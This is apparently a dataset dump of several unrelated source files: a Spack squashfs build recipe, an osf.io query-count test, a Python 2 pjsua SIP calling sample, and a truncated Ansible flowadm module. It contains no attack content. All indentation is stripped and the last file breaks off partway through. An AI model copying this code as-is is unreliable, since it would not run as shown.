variant('gzip', default=True, description='Enable gzip compression support')
variant('lz4', default=False, description='Enable LZ4 compression support')
variant('lzo', default=False, description='Enable LZO compression support')
variant('xz', default=False, description='Enable xz compression support')
variant('zstd', default=False, description='Enable Zstandard/zstd support')
variant('default_compression', default='gzip', values=('gzip', 'lz4', 'lzo', 'xz', 'zstd'),
multi=False, description='Default compression algorithm')
conflicts('squashfs~gzip default_compression=gzip', msg='Cannot set default compression to missing algorithm')
conflicts('squashfs~lz4 default_compression=lz4', msg='Cannot set default compression to missing algorithm')
conflicts('squashfs~lzo default_compression=lzo', msg='Cannot set default compression to missing algorithm')
conflicts('squashfs~xz default_compression=xz', msg='Cannot set default compression to missing algorithm')
conflicts('squashfs~zstd default_compression=zstd', msg='Cannot set default compression to missing algorithm')
depends_on('m4', type='build')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('zlib', when='+gzip')
depends_on('lz4', when='+lz4')
depends_on('lzo', when='+lzo')
depends_on('xz', when='+xz')
depends_on('zstd', when='+zstd')
def build(self, spec, prefix):
with working_dir('squashfs-tools'):
default = spec.variants['default_compression'].value
make(
'GZIP_SUPPORT={0}'.format(1 if '+gzip' in spec else 0),
'LZ4_SUPPORT={0}' .format(1 if '+lz4' in spec else 0),
'LZO_SUPPORT={0}' .format(1 if '+lzo' in spec else 0),
'XZ_SUPPORT={0}' .format(1 if '+xz' in spec else 0),
'ZSTD_SUPPORT={0}'.format(1 if '+zstd' in spec else 0),
'COMP_DEFAULT={0}'.format(default),
parallel=False
)
def install(self, spec, prefix):
with working_dir('squashfs-tools'):
make('install', 'INSTALL_DIR=%s' % prefix.bin, parallel=False)
|
lgpl-2.1
|
Nesiehr/osf.io
|
osf_tests/test_eager_queryset.py
|
4
|
1107
|
import pytest
from osf.models import Node
from osf_tests.factories import NodeFactory
@pytest.mark.django_db
class TestEagerQuerySet:
@pytest.mark.django_assert_num_queries
def test_select_related_does_correct_query(self, django_assert_num_queries):
node = NodeFactory()
node_id = node.id
with django_assert_num_queries(1):
fresh_node = Node.objects.select_related('creator').get(id=node_id)
cr = fresh_node.creator
@pytest.mark.django_assert_num_queries
def test_eager_fk_does_correct_query(self, django_assert_num_queries):
node = NodeFactory()
node_id = node.id
with django_assert_num_queries(1):
fresh_node = Node.objects.eager('creator').get(id=node_id)
cr = fresh_node.creator
@pytest.mark.django_assert_num_queries
def test_lazy_fk_does_correct_queries(self, django_assert_num_queries):
node = NodeFactory()
node_id = node.id
with django_assert_num_queries(2):
fresh_node = Node.objects.get(id=node_id)
cr = fresh_node.creator
|
apache-2.0
|
G0retZ/pjproject
|
pjsip-apps/src/py_pjsua/pjsua_app.py
|
33
|
21600
|
# $Id$
#
# Sample and simple Python script to make and receive calls, and do
# presence and instant messaging/IM using PJSUA-API binding for Python.
#
# Copyright (C) 2003-2007 Benny Prijono <[email protected]>
#
import py_pjsua
import sys
import thread
#
# Configurations
#
THIS_FILE = "pjsua_app.py"
C_QUIT = 0
C_LOG_LEVEL = 4
# STUN config.
# Set C_STUN_HOST to the address:port of the STUN server to enable STUN
#
C_STUN_HOST = ""
#C_STUN_HOST = "192.168.0.2"
#C_STUN_HOST = "stun.iptel.org:3478"
# SIP port
C_SIP_PORT = 5060
# Globals
#
g_ua_cfg = None
g_acc_id = py_pjsua.PJSUA_INVALID_ID
g_current_call = py_pjsua.PJSUA_INVALID_ID
g_wav_files = []
g_wav_id = 0
g_wav_port = 0
g_rec_file = ""
g_rec_id = 0
g_rec_port = 0
# Utility: display PJ error and exit
#
def err_exit(title, rc):
py_pjsua.perror(THIS_FILE, title, rc)
py_pjsua.destroy()
exit(1)
# Logging function (also callback, called by pjsua-lib)
#
def log_cb(level, str, len):
if level <= C_LOG_LEVEL:
print str,
def write_log(level, str):
log_cb(level, str + "\n", 0)
# Utility to get call info
#
def call_name(call_id):
ci = py_pjsua.call_get_info(call_id)
return "[Call " + `call_id` + " " + ci.remote_info + "]"
# Callback when call state has changed.
#
def on_call_state(call_id, e):
global g_current_call
ci = py_pjsua.call_get_info(call_id)
write_log(3, call_name(call_id) + " state = " + `ci.state_text`)
if ci.state == py_pjsua.PJSIP_INV_STATE_DISCONNECTED:
g_current_call = py_pjsua.PJSUA_INVALID_ID
# Callback for incoming call
#
def on_incoming_call(acc_id, call_id, rdata):
global g_current_call
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
# There's call in progress - answer Busy
py_pjsua.call_answer(call_id, 486, None, None)
return
g_current_call = call_id
ci = py_pjsua.call_get_info(call_id)
write_log(3, "*** Incoming call: " + call_name(call_id) + "***")
write_log(3, "*** Press a to answer or h to hangup ***")
# Callback when media state has changed (e.g. established or terminated)
#
def on_call_media_state(call_id):
ci = py_pjsua.call_get_info(call_id)
if ci.media_status == py_pjsua.PJSUA_CALL_MEDIA_ACTIVE:
py_pjsua.conf_connect(ci.conf_slot, 0)
py_pjsua.conf_connect(0, ci.conf_slot)
write_log(3, call_name(call_id) + ": media is active")
else:
write_log(3, call_name(call_id) + ": media is inactive")
# Callback when account registration state has changed
#
def on_reg_state(acc_id):
acc_info = py_pjsua.acc_get_info(acc_id)
if acc_info.has_registration != 0:
cmd = "registration"
else:
cmd = "unregistration"
if acc_info.status != 0 and acc_info.status != 200:
write_log(3, "Account " + cmd + " failed: rc=" + `acc_info.status` + " " + acc_info.status_text)
else:
write_log(3, "Account " + cmd + " success")
# Callback when buddy's presence state has changed
#
def on_buddy_state(buddy_id):
write_log(3, "On Buddy state called")
buddy_info = py_pjsua.buddy_get_info(buddy_id)
if buddy_info.status != 0 and buddy_info.status != 200:
write_log(3, "Status of " + `buddy_info.uri` + " is " + `buddy_info.status_text`)
else:
write_log(3, "Status : " + `buddy_info.status`)
# Callback on incoming pager (MESSAGE)
#
def on_pager(call_id, strfrom, strto, contact, mime_type, text):
write_log(3, "MESSAGE from " + `strfrom` + " : " + `text`)
# Callback on the delivery status of outgoing pager (MESSAGE)
#
def on_pager_status(call_id, strto, body, user_data, status, reason):
write_log(3, "MESSAGE to " + `strto` + " status " + `status` + " reason " + `reason`)
# Received typing indication
#
def on_typing(call_id, strfrom, to, contact, is_typing):
str_t = ""
if is_typing:
str_t = "is typing.."
else:
str_t = "has stopped typing"
write_log(3, "IM indication: " + strfrom + " " + str_t)
# Received the status of previous call transfer request
#
def on_call_transfer_status(call_id,status_code,status_text,final,p_cont):
strfinal = ""
if final == 1:
strfinal = "[final]"
write_log(3, "Call " + `call_id` + ": transfer status= " + `status_code` + " " + status_text+ " " + strfinal)
if status_code/100 == 2:
write_log(3, "Call " + `call_id` + " : call transferred successfully, disconnecting call")
status = py_pjsua.call_hangup(call_id, 410, None, None)
p_cont = 0
# Callback on incoming call transfer request
#
def on_call_transfer_request(call_id, dst, code):
write_log(3, "Call transfer request from " + `call_id` + " to " + dst + " with code " + `code`)
#
# Initialize pjsua.
#
def app_init():
global g_acc_id, g_ua_cfg
# Create pjsua before anything else
status = py_pjsua.create()
if status != 0:
err_exit("pjsua create() error", status)
# Create and initialize logging config
log_cfg = py_pjsua.logging_config_default()
log_cfg.level = C_LOG_LEVEL
log_cfg.cb = log_cb
# Create and initialize pjsua config
# Note: for this Python module, thread_cnt must be 0 since Python
# doesn't like to be called from alien thread (pjsua's thread
# in this case)
ua_cfg = py_pjsua.config_default()
ua_cfg.thread_cnt = 0
ua_cfg.user_agent = "PJSUA/Python 0.1"
ua_cfg.cb.on_incoming_call = on_incoming_call
ua_cfg.cb.on_call_media_state = on_call_media_state
ua_cfg.cb.on_reg_state = on_reg_state
ua_cfg.cb.on_call_state = on_call_state
ua_cfg.cb.on_buddy_state = on_buddy_state
ua_cfg.cb.on_pager = on_pager
ua_cfg.cb.on_pager_status = on_pager_status
ua_cfg.cb.on_typing = on_typing
ua_cfg.cb.on_call_transfer_status = on_call_transfer_status
ua_cfg.cb.on_call_transfer_request = on_call_transfer_request
# Configure STUN setting
if C_STUN_HOST != "":
ua_cfg.stun_host = C_STUN_HOST;
# Create and initialize media config
med_cfg = py_pjsua.media_config_default()
med_cfg.ec_tail_len = 0
#
# Initialize pjsua!!
#
status = py_pjsua.init(ua_cfg, log_cfg, med_cfg)
if status != 0:
err_exit("pjsua init() error", status)
# Configure UDP transport config
transport_cfg = py_pjsua.transport_config_default()
transport_cfg.port = C_SIP_PORT
# Create UDP transport
status, transport_id = \
py_pjsua.transport_create(py_pjsua.PJSIP_TRANSPORT_UDP, transport_cfg)
if status != 0:
err_exit("Error creating UDP transport", status)
# Create initial default account
status, acc_id = py_pjsua.acc_add_local(transport_id, 1)
if status != 0:
err_exit("Error creating account", status)
g_acc_id = acc_id
g_ua_cfg = ua_cfg
# Add SIP account interactively
#
def add_account():
global g_acc_id
acc_domain = ""
acc_username = ""
acc_passwd =""
confirm = ""
# Input account configs
print "Your SIP domain (e.g. myprovider.com): ",
acc_domain = sys.stdin.readline()
if acc_domain == "\n":
return
acc_domain = acc_domain.replace("\n", "")
print "Your username (e.g. alice): ",
acc_username = sys.stdin.readline()
if acc_username == "\n":
return
acc_username = acc_username.replace("\n", "")
print "Your password (e.g. secret): ",
acc_passwd = sys.stdin.readline()
if acc_passwd == "\n":
return
acc_passwd = acc_passwd.replace("\n", "")
# Configure account configuration
acc_cfg = py_pjsua.acc_config_default()
acc_cfg.id = "sip:" + acc_username + "@" + acc_domain
acc_cfg.reg_uri = "sip:" + acc_domain
cred_info = py_pjsua.Pjsip_Cred_Info()
cred_info.realm = "*"
cred_info.scheme = "digest"
cred_info.username = acc_username
cred_info.data_type = 0
cred_info.data = acc_passwd
acc_cfg.cred_info.append(1)
acc_cfg.cred_info[0] = cred_info
# Add new SIP account
status, acc_id = py_pjsua.acc_add(acc_cfg, 1)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error adding SIP account", status)
else:
g_acc_id = acc_id
write_log(3, "Account " + acc_cfg.id + " added")
def add_player():
global g_wav_files
global g_wav_id
global g_wav_port
file_name = ""
status = -1
wav_id = 0
print "Enter the path of the file player(e.g. /tmp/audio.wav): ",
file_name = sys.stdin.readline()
if file_name == "\n":
return
file_name = file_name.replace("\n", "")
status, wav_id = py_pjsua.player_create(file_name, 0)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error adding file player ", status)
else:
g_wav_files.append(file_name)
if g_wav_id == 0:
g_wav_id = wav_id
g_wav_port = py_pjsua.player_get_conf_port(wav_id)
write_log(3, "File player " + file_name + " added")
def add_recorder():
global g_rec_file
global g_rec_id
global g_rec_port
file_name = ""
status = -1
rec_id = 0
print "Enter the path of the file recorder(e.g. /tmp/audio.wav): ",
file_name = sys.stdin.readline()
if file_name == "\n":
return
file_name = file_name.replace("\n", "")
status, rec_id = py_pjsua.recorder_create(file_name, 0, None, 0, 0)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error adding file recorder ", status)
else:
g_rec_file = file_name
g_rec_id = rec_id
g_rec_port = py_pjsua.recorder_get_conf_port(rec_id)
write_log(3, "File recorder " + file_name + " added")
def conf_list():
ports = None
print "Conference ports : "
ports = py_pjsua.enum_conf_ports()
for port in ports:
info = None
info = py_pjsua.conf_get_port_info(port)
txlist = ""
for listener in info.listeners:
txlist = txlist + "#" + `listener` + " "
print "Port #" + `info.slot_id` + "[" + `(info.clock_rate/1000)` + "KHz/" + `(info.samples_per_frame * 1000 / info.clock_rate)` + "ms] " + info.name + " transmitting to: " + txlist
def connect_port():
src_port = 0
dst_port = 0
print "Connect src port # (empty to cancel): "
src_port = sys.stdin.readline()
if src_port == "\n":
return
src_port = src_port.replace("\n", "")
src_port = int(src_port)
print "To dst port # (empty to cancel): "
dst_port = sys.stdin.readline()
if dst_port == "\n":
return
dst_port = dst_port.replace("\n", "")
dst_port = int(dst_port)
status = py_pjsua.conf_connect(src_port, dst_port)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error connecting port ", status)
else:
write_log(3, "Port connected from " + `src_port` + " to " + `dst_port`)
def disconnect_port():
src_port = 0
dst_port = 0
print "Disconnect src port # (empty to cancel): "
src_port = sys.stdin.readline()
if src_port == "\n":
return
src_port = src_port.replace("\n", "")
src_port = int(src_port)
print "From dst port # (empty to cancel): "
dst_port = sys.stdin.readline()
if dst_port == "\n":
return
dst_port = dst_port.replace("\n", "")
dst_port = int(dst_port)
status = py_pjsua.conf_disconnect(src_port, dst_port)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error disconnecting port ", status)
else:
write_log(3, "Port disconnected " + `src_port` + " from " + `dst_port`)
def dump_call_quality():
global g_current_call
buf = ""
if g_current_call != -1:
buf = py_pjsua.call_dump(g_current_call, 1, 1024, " ")
write_log(3, "\n" + buf)
else:
write_log(3, "No current call")
def xfer_call():
global g_current_call
if g_current_call == -1:
write_log(3, "No current call")
else:
call = g_current_call
ci = py_pjsua.call_get_info(g_current_call)
print "Transferring current call ["+ `g_current_call` + "] " + ci.remote_info
print "Enter sip url : "
url = sys.stdin.readline()
if url == "\n":
return
url = url.replace("\n", "")
if call != g_current_call:
print "Call has been disconnected"
return
msg_data = py_pjsua.msg_data_init()
status = py_pjsua.call_xfer(g_current_call, url, msg_data);
if status != 0:
py_pjsua.perror(THIS_FILE, "Error transferring call ", status)
else:
write_log(3, "Call transferred to " + url)
def xfer_call_replaces():
if g_current_call == -1:
write_log(3, "No current call")
else:
call = g_current_call
ids = py_pjsua.enum_calls()
if len(ids) <= 1:
print "There are no other calls"
return
ci = py_pjsua.call_get_info(g_current_call)
print "Transfer call [" + `g_current_call` + "] " + ci.remote_info + " to one of the following:"
for i in range(0, len(ids)):
if ids[i] == call:
continue
call_info = py_pjsua.call_get_info(ids[i])
print `ids[i]` + " " + call_info.remote_info + " [" + call_info.state_text + "]"
print "Enter call number to be replaced : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
return
dst_call = int(buf)
if call != g_current_call:
print "Call has been disconnected"
return
if dst_call == call:
print "Destination call number must not be the same as the call being transferred"
return
if dst_call >= py_pjsua.PJSUA_MAX_CALLS:
print "Invalid destination call number"
return
if py_pjsua.call_is_active(dst_call) == 0:
print "Invalid destination call number"
return
py_pjsua.call_xfer_replaces(call, dst_call, 0, None)
#
# Worker thread function.
# Python doesn't like it when it's called from an alien thread
# (pjsua's worker thread, in this case), so for Python we must
# disable worker thread in pjsua and poll pjsua from Python instead.
#
def worker_thread_main(arg):
global C_QUIT
thread_desc = 0;
status = py_pjsua.thread_register("python worker", thread_desc)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error registering thread", status)
else:
while C_QUIT == 0:
py_pjsua.handle_events(50)
print "Worker thread quitting.."
C_QUIT = 2
# Start pjsua
#
def app_start():
# Done with initialization, start pjsua!!
#
status = py_pjsua.start()
if status != 0:
err_exit("Error starting pjsua!", status)
# Start worker thread
thr = thread.start_new(worker_thread_main, (0,))
print "PJSUA Started!!"
# Print account and buddy list
def print_acc_buddy_list():
global g_acc_id
acc_ids = py_pjsua.enum_accs()
print "Account list:"
for acc_id in acc_ids:
acc_info = py_pjsua.acc_get_info(acc_id)
if acc_info.has_registration == 0:
acc_status = acc_info.status_text
else:
acc_status = `acc_info.status` + "/" + acc_info.status_text + " (expires=" + `acc_info.expires` + ")"
if acc_id == g_acc_id:
print " *",
else:
print " ",
print "[" + `acc_id` + "] " + acc_info.acc_uri + ": " + acc_status
print " Presence status: ",
if acc_info.online_status != 0:
print "Online"
else:
print "Invisible"
if py_pjsua.get_buddy_count() > 0:
print ""
print "Buddy list:"
buddy_ids = py_pjsua.enum_buddies()
for buddy_id in buddy_ids:
bi = py_pjsua.buddy_get_info(buddy_id)
print " [" + `buddy_id` + "] " + bi.status_text + " " + bi.uri
# Print application menu
#
def print_menu():
print ""
print ">>>"
print_acc_buddy_list()
print """
+============================================================================+
| Call Commands : | Buddy, IM & Presence: | Account: |
| | | |
| m Make call | +b Add buddy | +a Add account |
| a Answer current call | -b Delete buddy | -a Delete accnt |
| h Hangup current call | | |
| H Hold call | i Send instant message | rr register |
| v re-inVite (release Hold) | s Subscribe presence | ru Unregister |
| # Send DTMF string | u Unsubscribe presence | |
| dq Dump curr. call quality | t ToGgle Online status | |
| +--------------------------+------------------+
| x Xfer call | Media Commands: | Status: |
| X Xfer with Replaces | | |
| | cl List ports | d Dump status |
| | cc Connect port | dd Dump detail |
| | cd Disconnect port | |
| | +p Add file player | |
|------------------------------+ +r Add file recorder | |
| q Quit application | | |
+============================================================================+"""
print "You have " + `py_pjsua.call_get_count()` + " active call(s)"
print ">>>",
# Menu
#
def app_menu():
global g_acc_id
global g_current_call
quit = 0
while quit == 0:
print_menu()
choice = sys.stdin.readline()
if choice[0] == "q":
quit = 1
elif choice[0] == "i":
# Sending IM
print "Send IM to SIP URL: ",
url = sys.stdin.readline()
if url == "\n":
continue
# Send typing indication
py_pjsua.im_typing(g_acc_id, url, 1, None)
print "The content: ",
message = sys.stdin.readline()
if message == "\n":
py_pjsua.im_typing(g_acc_id, url, 0, None)
continue
# Send the IM!
py_pjsua.im_send(g_acc_id, url, None, message, None, 0)
elif choice[0] == "m":
# Make call
print "Using account ", g_acc_id
print "Make call to SIP URL: ",
url = sys.stdin.readline()
url = url.replace("\n", "")
if url == "":
continue
# Initiate the call!
status, call_id = py_pjsua.call_make_call(g_acc_id, url, 0, 0, None)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error making call", status)
else:
g_current_call = call_id
elif choice[0] == "+" and choice[1] == "b":
# Add new buddy
bc = py_pjsua.Buddy_Config()
print "Buddy URL: ",
bc.uri = sys.stdin.readline()
if bc.uri == "\n":
continue
bc.uri = bc.uri.replace("\n", "")
bc.subscribe = 1
status, buddy_id = py_pjsua.buddy_add(bc)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error adding buddy", status)
elif choice[0] == "-" and choice[1] == "b":
print "Enter buddy ID to delete : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
continue
i = int(buf)
if py_pjsua.buddy_is_valid(i) == 0:
print "Invalid buddy id " + `i`
else:
py_pjsua.buddy_del(i)
print "Buddy " + `i` + " deleted"
elif choice[0] == "+" and choice[1] == "a":
# Add account
add_account()
elif choice[0] == "-" and choice[1] == "a":
print "Enter account ID to delete : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
continue
i = int(buf)
if py_pjsua.acc_is_valid(i) == 0:
print "Invalid account id " + `i`
else:
py_pjsua.acc_del(i)
print "Account " + `i` + " deleted"
elif choice[0] == "+" and choice[1] == "p":
add_player()
elif choice[0] == "+" and choice[1] == "r":
add_recorder()
elif choice[0] == "c" and choice[1] == "l":
conf_list()
elif choice[0] == "c" and choice[1] == "c":
connect_port()
elif choice[0] == "c" and choice[1] == "d":
disconnect_port()
elif choice[0] == "d" and choice[1] == "q":
dump_call_quality()
elif choice[0] == "x":
xfer_call()
elif choice[0] == "X":
xfer_call_replaces()
elif choice[0] == "h":
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
py_pjsua.call_hangup(g_current_call, 603, None, None)
else:
print "No current call"
elif choice[0] == "H":
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
py_pjsua.call_set_hold(g_current_call, None)
else:
print "No current call"
elif choice[0] == "v":
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
py_pjsua.call_reinvite(g_current_call, 1, None);
else:
print "No current call"
elif choice[0] == "#":
if g_current_call == py_pjsua.PJSUA_INVALID_ID:
print "No current call"
elif py_pjsua.call_has_media(g_current_call) == 0:
print "Media is not established yet!"
else:
call = g_current_call
print "DTMF strings to send (0-9*#A-B)"
buf = sys.stdin.readline()
buf = buf.replace("\n", "")
if buf == "":
continue
if call != g_current_call:
print "Call has been disconnected"
continue
status = py_pjsua.call_dial_dtmf(g_current_call, buf)
if status != 0:
py_pjsua.perror(THIS_FILE, "Unable to send DTMF", status);
else:
print "DTMF digits enqueued for transmission"
elif choice[0] == "s":
print "Subscribe presence of (buddy id) : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
continue
i = int(buf)
py_pjsua.buddy_subscribe_pres(i, 1)
elif choice[0] == "u":
print "Unsubscribe presence of (buddy id) : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
continue
i = int(buf)
py_pjsua.buddy_subscribe_pres(i, 0)
elif choice[0] == "t":
acc_info = py_pjsua.acc_get_info(g_acc_id)
if acc_info.online_status == 0:
acc_info.online_status = 1
else:
acc_info.online_status = 0
py_pjsua.acc_set_online_status(g_acc_id, acc_info.online_status)
st = ""
if acc_info.online_status == 0:
st = "offline"
else:
st = "online"
print "Setting " + acc_info.acc_uri + " online status to " + st
elif choice[0] == "r":
if choice[1] == "r":
py_pjsua.acc_set_registration(g_acc_id, 1)
elif choice[1] == "u":
py_pjsua.acc_set_registration(g_acc_id, 0)
elif choice[0] == "d":
py_pjsua.dump(choice[1] == "d")
elif choice[0] == "a":
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
py_pjsua.call_answer(g_current_call, 200, None, None)
else:
print "No current call"
#
# main
#
app_init()
app_start()
app_menu()
#
# Done, quitting..
#
print "PJSUA shutting down.."
C_QUIT = 1
# Give the worker thread chance to quit itself
while C_QUIT != 2:
py_pjsua.handle_events(50)
print "PJSUA destroying.."
py_pjsua.destroy()
|
gpl-2.0
|
wimnat/ansible-modules-extras
|
network/illumos/flowadm.py
|
29
|
15000
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Adam Števko <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: flowadm
short_description: Manage bandwidth resource control and priority for protocols, services and zones.
description:
- Create/modify/remove networking bandwidth and associated resources for a type of traffic on a particular link.
version_added: "2.2"
author: Adam Števko (@xen0l)
options:
name:
description: >
- A flow is defined as a set of attributes based on Layer 3 and Layer 4
headers, which can be used to identify a protocol, service, or a zone.
required: true
aliases: [ 'flow' ]
link:
description:
- Specifies the link to configure the flow on.
required: false
local_ip:
description:
- Identifies a network flow by the local IP address.
required: false
remote_ip:
description:
- Identifies a network flow by the remote IP address.
required: false
transport:
description: >
- Specifies a Layer 4 protocol to be used. It is typically used in combination with I(local_port) to
identify the service that needs special attention.
required: false
local_port:
description:
- Identifies a service specified by the local port.
required: false
dsfield:
description: >
- Identifies the 8-bit differentiated services field (as defined in
RFC 2474). The optional dsfield_mask is used to state the bits of interest in
the differentiated services field when comparing with the dsfield
value. Both values must be in hexadecimal.
required: false
maxbw:
description: >
- Sets the full duplex bandwidth for the flow. The bandwidth is
specified as an integer with one of the scale suffixes (K, M, or G
for Kbps, Mbps, and Gbps). If no units are specified, the input
value will be read as Mbps.
required: false
priority:
description:
- Sets the relative priority for the flow.
required: false
default: 'medium'
choices: [ 'low', 'medium', 'high' ]
temporary:
description:
- Specifies that the configured flow is temporary. Temporary
flows do not persist across reboots.
required: false
default: false
choices: [ "true", "false" ]
state:
description:
- Create, delete, or reset the flow.
required: false
default: present
choices: [ 'absent', 'present', 'resetted' ]
'''
EXAMPLES = '''
# Limit SSH traffic to 100M via vnic0 interface
flowadm: link=vnic0 flow=ssh_out transport=tcp local_port=22 maxbw=100M state=present
# Reset flow properties
flowadm: name=dns state=resetted
# Configure policy for EF PHB (DSCP value of 101110 from RFC 2598) with a bandwidth of 500 Mbps and a high priority.
flowadm: link=bge0 dsfield=0x2e:0xfc maxbw=500M priority=high flow=efphb-flow state=present
'''
RETURN = '''
name:
description: flow name
returned: always
type: string
sample: "http_drop"
link:
description: flow's link
returned: if link is defined
type: string
sample: "vnic0"
state:
description: state of the target
returned: always
type: string
sample: "present"
temporary:
description: flow's persistence
returned: always
type: boolean
sample: "True"
priority:
description: flow's priority
returned: if priority is defined
type: string
sample: "low"
transport:
description: flow's transport
returned: if transport is defined
type: string
sample: "tcp"
maxbw:
description: flow's maximum bandwidth
returned: if maxbw is defined
type: string
sample: "100M"
local_ip:
description: flow's local IP address
returned: if local_ip is defined
type: string
sample: "10.0.0.42"
local_port:
description: flow's local port
returned: if local_port is defined
type: int
sample: 1337
remote_ip:
description: flow's remote IP address
returned: if remote_ip is defined
type: string
sample: "10.0.0.42"
dsfield:
description: flow's differentiated services value
returned: if dsfield is defined
type: string
sample: "0x2e:0xfc"
'''
import socket
SUPPORTED_TRANSPORTS = ['tcp', 'udp', 'sctp', 'icmp', 'icmpv6']
SUPPORTED_PRIORITIES = ['low', 'medium', 'high']
SUPPORTED_ATTRIBUTES = ['local_ip', 'remote_ip', 'transport', 'local_port', 'dsfield']
SUPPORTED_PROPERTIES = ['maxbw', 'priority']
class Flow(object):
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.link = module.params['link']
self.local_ip = module.params['local_ip']
self.remote_ip = module.params['remote_ip']
self.transport = module.params['transport']
self.local_port = module.params['local_port']
self.dsfield = module.params['dsfield']
self.maxbw = module.params['maxbw']
self.priority = module.params['priority']
self.temporary = module.params['temporary']
self.state = module.params['state']
self._needs_updating = {
'maxbw': False,
'priority': False,
}
@classmethod
def is_valid_port(cls, port):
return 1 <= int(port) <= 65535
@classmethod
def is_valid_address(cls, ip):
netmask = None
if ip.count('/') == 1:
ip_address, netmask = ip.split('/')
else:
ip_address = ip
if len(ip_address.split('.')) == 4:
try:
socket.inet_pton(socket.AF_INET, ip_address)
except socket.error:
return False
# netmask arrives as a string and may be absent, so guard and convert
if netmask is not None and not 0 <= int(netmask) <= 32:
return False
else:
try:
socket.inet_pton(socket.AF_INET6, ip_address)
except socket.error:
return False
if netmask is not None and not 0 <= int(netmask) <= 128:
return False
return True
@classmethod
def is_hex(cls, number):
try:
int(number, 16)
except ValueError:
return False
return True
@classmethod
def is_valid_dsfield(cls, dsfield):
dsmask = None
if dsfield.count(':') == 1:
dsval, dsmask = dsfield.split(':')
else:
dsval = dsfield
if dsmask and not 0x01 <= int(dsmask, 16) <= 0xff and not 0x01 <= int(dsval, 16) <= 0xff:
return False
elif not 0x01 <= int(dsval, 16) <= 0xff:
return False
return True
def flow_exists(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('show-flow')
cmd.append(self.name)
(rc, _, _) = self.module.run_command(cmd)
if rc == 0:
return True
else:
return False
def delete_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('remove-flow')
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def create_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('add-flow')
cmd.append('-l')
cmd.append(self.link)
if self.local_ip:
cmd.append('-a')
cmd.append('local_ip=' + self.local_ip)
if self.remote_ip:
cmd.append('-a')
cmd.append('remote_ip=' + self.remote_ip)
if self.transport:
cmd.append('-a')
cmd.append('transport=' + self.transport)
if self.local_port:
cmd.append('-a')
cmd.append('local_port=' + self.local_port)
if self.dsfield:
cmd.append('-a')
cmd.append('dsfield=' + self.dsfield)
if self.maxbw:
cmd.append('-p')
cmd.append('maxbw=' + self.maxbw)
if self.priority:
cmd.append('-p')
cmd.append('priority=' + self.priority)
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def _query_flow_props(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('show-flowprop')
cmd.append('-c')
cmd.append('-o')
cmd.append('property,possible')
cmd.append(self.name)
return self.module.run_command(cmd)
def flow_needs_updating(self):
(rc, out, err) = self._query_flow_props()
NEEDS_UPDATING = False
if rc == 0:
properties = (line.split(':') for line in out.rstrip().split('\n'))
for prop, value in properties:
if prop == 'maxbw' and self.maxbw != value:
self._needs_updating.update({prop: True})
NEEDS_UPDATING = True
elif prop == 'priority' and self.priority != value:
self._needs_updating.update({prop: True})
NEEDS_UPDATING = True
return NEEDS_UPDATING
else:
self.module.fail_json(msg='Error while checking flow properties: %s' % err,
stderr=err,
rc=rc)
def update_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('set-flowprop')
if self.maxbw and self._needs_updating['maxbw']:
cmd.append('-p')
cmd.append('maxbw=' + self.maxbw)
if self.priority and self._needs_updating['priority']:
cmd.append('-p')
cmd.append('priority=' + self.priority)
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
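# main() below calls flow.reset_flow() for state=resetted, but the class as
# written never defines it. Minimal sketch, assuming flowadm's
# 'reset-flowprop' subcommand restores flow properties to their defaults.
def reset_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('reset-flowprop')
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)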
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True, aliases=['flow']),
link=dict(required=False),
local_ip=dict(required=False),
remote_ip=dict(required=False),
transport=dict(required=False, choices=SUPPORTED_TRANSPORTS),
local_port=dict(required=False),
dsfield=dict(required=False),
maxbw=dict(required=False),
priority=dict(required=False,
default='medium',
choices=SUPPORTED_PRIORITIES),
temporary=dict(default=False, type='bool'),
state=dict(required=False,
default='present',
choices=['absent', 'present', 'resetted']),
),
mutually_exclusive=[
('local_ip', 'remote_ip'),
('local_ip', 'transport'),
('local_ip', 'local_port'),
('local_ip', 'dsfield'),
('remote_ip', 'transport'),
('remote_ip', 'local_port'),
('remote_ip', 'dsfield'),
('transport', 'dsfield'),
('local_port', 'dsfield'),
],
supports_check_mode=True
)
flow = Flow(module)
rc = None
out = ''
